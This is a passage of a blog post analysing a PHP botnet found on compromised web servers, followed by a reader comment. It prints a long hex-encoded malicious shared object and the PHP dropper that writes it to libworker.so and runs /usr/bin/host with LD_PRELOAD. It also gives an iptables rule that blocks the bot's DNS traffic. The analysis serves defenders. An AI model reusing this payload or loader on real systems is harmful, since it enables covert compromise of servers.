x98x65x54x3cx84x8dx44x77x17x74x01x6ax65x85x37xd6xb8x51xa2xbbx7ex00x2bx95xfcxbbx68x4bx5fx56xc4xf7xbbx19x33x40xa6x78xb7xbexecxb8x28x51x3dx5fx27xf6xb1xc9xb1x2fxc9xdcxc4xc6x98x2cx11xf7x83xd6xeex3exefx21x7ex95x99x36x53x85xeex7bxd6x2cxdbxfdx22x8cxc7xd3xbbx90xb0x80x56x48xacx68x3fx2fx3ex2dx6ex2dx4execxc2xe8x22x16x6dx11x91x44x3dx6cx41x5fxf8x08x32xb4x99xe2x34xefx2axe0x57x69x10x95x96x7exc2xe5x6ax85xcdx8dx9bx3ax9ex2cx7exdbx99xc0x3ax91xc8x6cx45x61x4fx79x51x79x5axa8xe3x6ax3ex79xe8x00x5ex52x85x2bxdfx20x66x7dx4dxe4x58xe6xa4x92x77x6dxffxbdxcex4ex36x1fxc7x90xc8xaaxfax06x24xe2x06x82x35x8cxaex14xacx14x92xf9xf8xeaxdfx9dx7dx57x0ax7cx14xd8xcax4axf8x91xdbxc0x3cxd5xc6x60xb8xccxe2xedx58x90x01x05xa4x93xfex9dx7exdex3axfbx35x44x77x49x1cx41x93x14xd2x6exd4x0ex44x9ax6exfcx67x51xe9xbfxe1xeaxc4x86x7exc3x23xfcxa1x5dxf7xd6xa1x6ex1fxbdxafxb2xd2x81x21xa6x90x65x41xfex61xa8x4fx4ax67x31x34x2cxb7xb2xefxdaxaex90x37xa5x66xd8x13x85x95xc2x37x67x44x58x0exd4xbdx4fxd2x1exf7x22x68x5ex53x9dx8ax0ax4fx79xe4xfex09x1bxa3x6fxf3xb7xf4x88x79x2cxf0xbdx84xfex91x42x4dx64x60x44x86xc9xa2xd9x66x2dxe3xb5xa6xc7xb3xb0xe2x57x1fxd5x0ex14x5dx87x40x4dx45xc4x4bxd6x06x98x3ax67xdcxc0x30x7fx99x96xacx7cx4bx52x43xffx02x25x56x22xfax64x36x58xebx76xa5x30x3axf1x07x41x89x41xa8x66x02xd8xe5x9bx6ex91x18xb9xe3x5bxb8xe6x81x0ex08x7bx72x3exd3x5exb4x79x8exeex6ax95x2fxf3xd7xd7x59xd9xafx3ex74x1dxcfx8cxd7xb3xe8x8fx99x69x9exa1xe4x10xdfxb8x6ex93x31xfdx81x9bx92xb1x8ex69x88xe8x42x38x26xb7x55xf6x43x2cxa9x2bxbcx42x94x5axe3x79x6axc2x31xd9x55x62xd6xd6xfdx68x87x8bxd2x10x73x14x48x9axcbx9dx90x0fxcax39x3ax86x7bxcfxe0x5ex48x4ax20x79x23x75xdbxf9x4bxd8x62xd3x63x34xe3xd7x48x2bx71x14xc8x01x23x92x3ax5dx18xb5x2cxf8x13x74x43x33xedx66xa8xc8x60xf3xa0xc2xc6x04xf6xa9xdbx3exd4x4cx52x9dx4dx75x2fx87xd3x48x3cxffx40x4fx74x83x82x61xeax2ax2ax4ax1dxcax0cxe4xcex02x8dxa9x40x62xf5x93xffx42x08x2exc9xdbx76x05xdbxb7x54x4fx3axd6xb0x24x00xdax6ex1exa5x7ax02x73x7cx8fx1dxbdxf1x12x50xf0x55x58x1fx1ex34x95x24x0fx4cx78x5ex87x4fx0exabx4fxe9x1ax6dx8ex94x6fx01x11xffx1excexf0x31x1exe1x86x76x00xa4xaax95xc8xb9xe2x41x17x69x90x26x14xdfx0fx2ex4dx9dxc3xbcx9exd4xbbxbdxa2xacxeexc0x8dx74x36x8dx18xe1x22xe1x9ax04x22xb2x6dxb2xd8x82x91xe7xb0xdex84x73x9bx22x47x56xdfxe9x02xcdxa9x8fx41xe0x1cx5axc1x3fx3bx5bx43x5dx0dxb1x0fxe5x33xa0xccxe3x7fx50x57x1ax73x9ex70x52x88x73x20x31x02x61x11x1fxbbxd2x5exf6x2exa1x53x3bx52x62x21x85x03xedx69x82x3exc0x9cxb1x5ex0cx03xe6x7fx23x18x82x85x29xa1x40xfcxffx37x2axa0x8ax65xf3xedx86x78xf0x74xe1x72xb2xa1x0ex63x00x1ax66xe6x9ax8axfex1cx0fx28xbdx4fx24xbcx86x4ex5cx11xb3x4fxfex3axc8xeexaexa9x60x60x4bx6exc3x4bx88x29x31x22xb3x30x3exc2x58xfbx12x7cxb7x98xcax14xa9x7dx63xa7xb7x2bx95x65xd5xf5xc5x20x63x88x6bxecxb2x9cx0ex65xccx4dx28x24x48x3axa0x00xd2x6ax14x7cxe8x77x23x9fxa3xb9x05x78xaexcax98x12x53x03xfex05x9fx0cx6ax6cx59x92x90xa2xccx31xa2x9fx9bxb6x1bx83x2dx3ex23xd0xf7x28x48xa6xf2xe0xb8x45xe3xb6x4ax83xc2xb5xefx1cx47x7fxbex14xb0x60xb3x4cx16xcexcfx43x0cxf2x14x04x1ax5cxaax0dx3dx62x52x20x18x9dxa3xdax52x92xf6x99x12xb4xadxc2x14x60x0ex2ax2exdex6ex3bxd0x82x3fxebxdexe9xf8x1bx4bx4ax3cx63xe7xdfx3dx39x72x34xd3x84xe8x80x46xfdxe1x55x27x0fx33x95x4ax03x17x89xeexf6x72xe6x11xbdx31x4dx20x18x2dx5ex52x9fx92x25x23x7axa5x69x77x86xbex9fx96xf1x34xe0xf5x4cx6axe3x42xdcxcax53x9axfbxa1xbax13xcex18x65x6dxaax8ax90x25x30xf9x9cxb6xb8x3bx4cxa9x70x2dx9exbcx97x82xfex73x4cx51x0dx47xf2xc8x5axc0xe0xc0x2dx8bx4axbdxb0x7axb7x4cx31x6fx88x7dx18xf8xaaxb7xb4x41x39xb2xb5x85x03xc2xccxf6x8ax26xb6x6bxe6xe4xf6x31xa1xa6xabx58xf2xdcxc7x7ax5axe0x72x04x97x26x46xd0xd8xfbx55xdcxbdx21xd2x48x47x88xb3x2ex6cxa9x5fx0ex4fx0ax66x41xe7x2exbcx41x0ex2ex45xa5x55x8bx75x2dx86xcax09x44xebxdbx8cx32x64x3fx60xd0xe8xbfxdex37xcax45x78xb1x73x34xf2x81x63x37x26xb8xc3x9bxe5x49x65xefx8dx50xcax19x82x2ex58xe3xffx40xa2xddx77x6cx22xf0x1dx95x24x0fx16x87x47x3cx3fx0axd7x25x53x3cx14xe1x8cxdexfax0fx0dx53xf2x0cx93x94xe9x0bx01x0cxfbx1exa1x1fx2exb8xa7x75xf4xe6x7fxccx0bxd2x08x1fxb3x95xfexaexa4x0bx01x96x17x94x2ax00x9fx2bx0cx9ax4axaexbax78x66x61xedx5ax47x6cx26x53x3ex2fx72xf2xc4x70xa0x68x7bxa1xfex92x35x28x93xd5x54x9fx6fx9ex4dx29x16xb3x8ax03x0exd2x6fx34x25xadx63x97x9fx27x08x3fx8fx83xe0x8dx16x16xb6xa9xebx0ax48x5axa8x96x84xbex49x0exc1x57xe0x30x8cx05xddxefx9dx7dx17xa5xbcxa6x28x9dx34x3exb3xeaxe7x9exf4x30xf8x9cxc6x7cx5ax0fx8bx1bx67x6bx4bxf3x71x28xe2x0exa5xf9xb3x62xa0xdbxffxd4x1axb2xbex01x50xb2x31x48x4exf7xc5xa8x07x50xc3x6exbbx0ex61x2cx36x43x3axdcx3dxedx3exddxc9x3dxb1xe3xefx6fxe4x3fx21x16x87x6fx0dx4cx17x14x9cxdax82x58xe8xe3x84x1ex27xbfxfax64xacx38x41x75x75xf2x58x64x61x3dxa3x82x53x2bxf1x60x77x08x75x14xe2xf7x6cxcaxdbxf0xe8x02xafxe3x66x5cx1bxa7xd1x91x99x2axf5xfax67x99x7cxbaxc4x6dx1ax3bx75x8fx4fx57x87xbbx21x62xacx09x64x5bxecxcaxb7x08x71x89x99x0axb3x8ex04x1ax27x80xd4xebxedxeex27x62x7ex76xb9x05x32xdax67xdexe3xcbx39xd0x95xf1xd8x06x7ax71x10x2dxffx14x47x27x94x1bx12x81x09x39xe3x87xb0x9cx8cxe2x76xf3xc0x59xbexf9x29x53xeax01x59x64x72x69x91x72x7dxd8x99x11xf3xabx92xfdxe5x75x84x95x11x11x77x87x04x37xe1xc3x30x0ax16x1bx0cx70x7fx7exd9x11xf0x57xe9x89x68xddx35xfbxdax1ax70x5exafx82x6fx26x09x74x5dxeax37x8dxf5x4dxa8x01xbdx28x7fx97x39x70xeex22xf9x56xffx2ex51xd9x48xc2x38xf7x44xa7x1dx4dx1bx7ax38x52x08x2dxa0xb0x2ex5dxd8xadxf4x11x1dxe2x34x17x39x33x45x8ax0dx8ex4cx45x85x90xecxa3xdex08x1dx16x5ax25x43xfaxd6x71x58xaex1ex4cxc0x3cx2fxf4x53x68x27x98xf2x34x26x3fx79xacxcfx66x4fxadx6ex6cxc3xc8x92x06xc3x68x77x1bx16x96x67xd6xd2x96xcax25xfexf2xbdxf1x26xe4x30xa0x90xffx06xdfxadx74x4bx70x3cxddx77xffx45xeex1ax5cx84x82x32x56x18xfdx7bx17xefx39x08x15x1dx38xb5xadx37xbbx8cxe4x2fxd7x55x6cxb5xccx6bxfaxbax86x56x3fx08x89x95x20x86x11x37x75x4ax3fx8ax67x77x40x14xafxfbxa0x93x2bx77xe8x97x2cxb4x02x27x6fx88x7dxaex90x06x43xb1x8cx54xe8x01x9ex28x8cx05x9fxccx19x4exc7xb9xe2xf2x31xcax89x5dx7fx8cx84xeex14x02x9cxa5x08xdfx56x95x34x3ex96xd2x66x22xd8x06xeexf1x54xb6xabx36xa8xdcx01x32x39x80xbexbex6exd2xc0x0ax77xc8xe9xcdx5dx1dx0cxf4xf0x72x16xc8x78x05xb9xcdxbbx64x03x63x40x04x95x7ax84x53x38xf2x26xf8xfcx9dxc0xe6x6bx1ex03x77x12xf3xe9x28xbbx62x2dx75x2fxe8xd9x32x4cx1ax37xe1x94xbbx35xccxaex5bxc4xaaxf8x84x90x63xa2x94xdaxb4x87xc4xddx43x26x0axb8x55xf3x91x87x3fxabxbex20x3fx7ax55x0bx28xb0xcfxd2xa9x54x63x0cxf6xf7xe7xabx7exabx88xc1xd1x92x79x26x85x0bxadxc4xb6x6cxe5xf6xe6x3ax01x0exebxd1xe0x94x25x43xa0x1bx3ax87xc6xb9x32x4ex7ax03xe1xf4x29x66xffxd7x2bxb5x43x10xabx29x4axadx37x35x7ex17xc9xa3x5bx6axbex95xf1x85x4ex24xd3xc9x27xb4xbdx51x1bxbcx28x46x71x6bx56x1dx94xa0xcaxcbxd6x48xe2x9fxebx3dx09xa9xd3xfbx2ex21x1fx02xeax46xb6xa7x97xd1x63xbfx17xd5x2ax6dxf2xbex0exbcx89xe4x04x6cx83xefxa9x8dx98x7cx88xc7x9exa7xc9x88xedx7fx30x85x51x93x44x68x68x6fxd6x5ax2dxe4x16xb7xc8x1ax23x4bx09xccxd8xa2x49x60x69xe7x07x32x6fxf5xb1x9fx7ax02x33xbex6bx9bx2dx41xf6x5bx25x0cx12xedx27x35x38x30x01x11xd2x4ax71x3bx31x79x6dxa1x6ex1fx40xe8x21x73xa6x8cx0fxd4xcdx05x2fxf2x11x41xdfx38x76x18x69x77x29x3bxc2x9ax77xf3x13xe4x94x81x03xd5x69x25x48x10xb1x57xe4x7fx5cx13x71x6ex54x51xa6xcax69x0fx41x92x4bx03x2cxc2xf7x40xa6x8bxc1xaax60x2bxcfxa9x3bx80x00x1fxffx5dx32x71xcbx86xc2x71x50x2bx81x91xbdxccx95xe9x8ex8cx29x34x17xebxdex78x16xadx21x51x2ex21x4cx44x5fx50x52x45x4cx4fx41x44x00x2fx75x73x72x2fx62x69x6ex2fx75x6ex61x6dx65x20x2dx61x00x72x00x70x61x63x6bx65x74x73x20x25x64x20x72x61x6ex67x65x20x25x64x20x3dx20x25x64x0ax00x47x45x54x20x25x73x3fx72x3dx25x73x0dx0ax48x6fx73x74x3ax20x25x73x0dx0ax0dx0ax00x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax30x31x32x33x34x35x36x37x38x39x2bx2fx00x7cx24x24x24x7dx72x73x74x75x76x77x78x79x7ax7bx24x24x24x24x24x24x24x3ex3fx40x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x24x24x24x24x24x24x58x59x5ax5bx5cx5dx5ex5fx60x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x00x2fx64x65x76x2fx6ex75x6cx6cx00x41x55x00x28x6ex75x6cx6cx29x00";

This is the shared object that is loaded when host is executed below. A test is done to determine if the 32 bit or 64 bit object is loaded. If I get some spare time this weekend I will have a closer look at this - this is the part of the bot that does all the work.

$arch = 64;
if (intval("9223372036854775807") == 2147483647)
        $arch = 32;
/* DEBUG */ print "Arch is ".$arch."
"; $so = $arch == 32 ? $so32 : $so64; /* DEBUG */ print "SO dumped ".file_put_contents("./libworker.so", $so)."
"; exec("LD_PRELOAD='".$extra."./libworker.so' /usr/bin/host"); ?>

The architecture is tested and the appropriate shared object is dumped to the file libworker.so.

I believe the botnet uses the Google public DNS server (8.8.8.8) to communicate over UDP port 53. If you do not use this DNS server in your servers resolv.conf blocking UDP port 53 to it is recommended. You can do this with iptables easily:

iptables -I OUTPUT -p udp -d 8.8.8.8 --dport 53 -j DROP

I have some packet captures of the traffic, I will edit this post a bit later with examples.

Posted in Web and tagged , , , , , , .

3 Comments

  1. Thanks alot for posting this article. I work as a systems administrator and found /usr/bin/host running under the apache user, when I looked into system calls being down for that command, I came across this code, and googled it. You’re post is the only thing that’s helpful. I truly appreciate your work on this.

  2. Pingback: Backdoor:PHP/Shell.N - ovidiugabriel.net

Leave a Reply

Your email address will not be published. Required fields are marked *